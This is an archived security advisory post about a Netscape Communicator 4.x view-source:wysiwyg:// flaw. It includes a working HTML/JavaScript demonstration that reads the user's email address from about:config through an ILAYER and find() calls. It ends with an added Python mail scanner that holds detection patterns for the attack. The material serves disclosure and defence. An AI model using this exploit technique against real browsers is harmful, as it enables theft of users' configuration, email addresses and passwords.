There is a security vulnerability in Netscape Communicator 4.6 Win95, 4.07 Linux (probably all 4.x versions) in the way it works with "view-source:wysiwyg://1/javascript" URLs. It parses them in a "view-source" window. The problem is that it allows access to documents included in the parent document via ILAYER SRC="view-source:wysiwyg://1/" using find(). That allows reading the whole parsed document.

Vulnerabilities:
Browsing local directories
Reading user's cache
Reading parsed HTML files
Reading Netscape's configuration ("about:config") including user's email address, mail servers and password.
Probably others

This vulnerability may be exploited by using an HTML email message.

Workaround: Disable JavaScript

Netscape is notified about the problem.

Demonstration is available at:
http://www.nat.bg/~joro/viewsource.html

Regards,
Georgi Guninski
http://www.nat.bg/~joro
http://www.whitehats.com/guninski

[Attachment: viewsource.html (Content-Type: text/html; charset=koi8-r)]

<HTML>
<BODY>
There is a security vulnerability in Netscape Communicator 4.6 Win95, 4.07 Linux (probably all 4.x versions) in the way it works with "view-source:wysiwyg://1/javascript" URLs. It parses them in a "view-source" window. The problem is that it allows access to documents included in the parent document via ILAYER SRC="view-source:wysiwyg://1/" using find(). That allows reading the whole parsed document.
<BR>
Vulnerabilities:
<HR>
Browsing local directories<BR>
Reading user's cache<BR>
Reading parsed HTML files<BR>
Reading Netscape's configuration ("about:config") including user's email address, mail servers and password.<BR>
Probably others<BR>
<BR>
This vulnerability may be exploited by using an HTML email message.
<HR>
Workaround: Disable JavaScript
<HR>
This demonstration tries to find your email address; it may take some time.
<BR><BR>
<A HREF="http://www.nat.bg/~joro">Written by Georgi Guninski</A>
<HR>
<SCRIPT>
s="view-source:wysiwyg://1/javascript:s='<TITLE>tttt</TITLE>vvvv>>"
+"<ILAYER SRC=\"view-source:wysiwyg://1/about:config\"></ILAYER>"
+" <SCRIPT>blur();msg1=\"Your email is: \"; mend=\"general.\"+\"title_tips\";mag=\"mail.identity.useremail\"+\" = \";sp=\" \";res=mag;charstoread=50;"
+"setTimeout(\" "
+"for(i=0;i<charstoread;i++) {"
+" t=res;"
+" find(mend);"
+" for(c=1;c<256;c++) {"
+" t=res + String.fromCharCode(c);"
+" if (find(t,true,true)) {"
+" res=t;"
+" if (c==32) i=charstoread+1"
+" } "
+" }"
+"}"
+"res=res.substring(mag.length);"
+"alert(msg1 + res);"
+" ;\",3000);</"+"SCRIPT>'";
//a=window.open(s);
location=s;
</SCRIPT>
</BODY>
</HTML>
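Since the advisory notes that the bug can be triggered from an HTML email, a mail-gateway check for the indicators it describes is the natural defensive counterpart. The following is an added example, not part of Guninski's post: it parses a raw RFC 822 message with Python's email library and flags any text/html part that chains view-source: onto wysiwyg://, pulls about:config into a LAYER/ILAYER/FRAME/IFRAME, or calls find() with the two boolean flags the demonstration uses as a character oracle. Both sample messages are constructed for this example.

```python
import re
from email import message_from_string
from email.policy import default

# Indicators taken from the advisory: a view-source: URL wrapping a wysiwyg://
# URL, a layer/frame whose SRC points at about:config, and find(str,true,true)
# calls of the kind the demonstration loops over to read the parsed document.
INDICATORS = {
    "view-source-wysiwyg": re.compile(r"view-source:\s*wysiwyg://", re.I),
    "about-config-include": re.compile(
        r"<(?:I?LAYER|I?FRAME)\b[^>]*SRC\s*=\s*[\"']?[^\"'>]*about:config", re.I),
    "find-oracle-call": re.compile(r"\bfind\s*\([^)]*,\s*true\s*,\s*true\s*\)", re.I),
}

def html_parts(raw):
    """Yield the decoded body of every text/html part of a raw message."""
    msg = message_from_string(raw, policy=default)
    for part in msg.walk():
        if part.get_content_type() == "text/html":
            yield part.get_content()

def scan_message(raw):
    """Return the sorted indicator names found in any HTML part ([] if clean)."""
    hits = {name for html in html_parts(raw)
            for name, pat in INDICATORS.items() if pat.search(html)}
    return sorted(hits)

# Constructed sample messages (not real mail) for a quick self-check.
CLEAN_MAIL = """\
From: alice@example.invalid
Content-Type: text/html; charset=us-ascii

<HTML><BODY><A HREF="http://www.example.invalid/">Newsletter</A></BODY></HTML>
"""

FLAGGED_MAIL = """\
From: mallory@example.invalid
MIME-Version: 1.0
Content-Type: multipart/alternative; boundary="xyz"

--xyz
Content-Type: text/plain; charset=us-ascii

Plain-text alternative.
--xyz
Content-Type: text/html; charset=us-ascii

<HTML><BODY><ILAYER SRC="view-source:wysiwyg://1/about:config"></ILAYER>
</BODY></HTML>
--xyz--
"""

if __name__ == "__main__":
    print(scan_message(CLEAN_MAIL))    # []
    print(scan_message(FLAGGED_MAIL))  # ['about-config-include', 'view-source-wysiwyg']
```

The same patterns can be matched against an outbound HTTP proxy log or a web-mail renderer's sanitizer; the MIME walk only matters where the message arrives as raw mail.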
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 14:48:01 PDT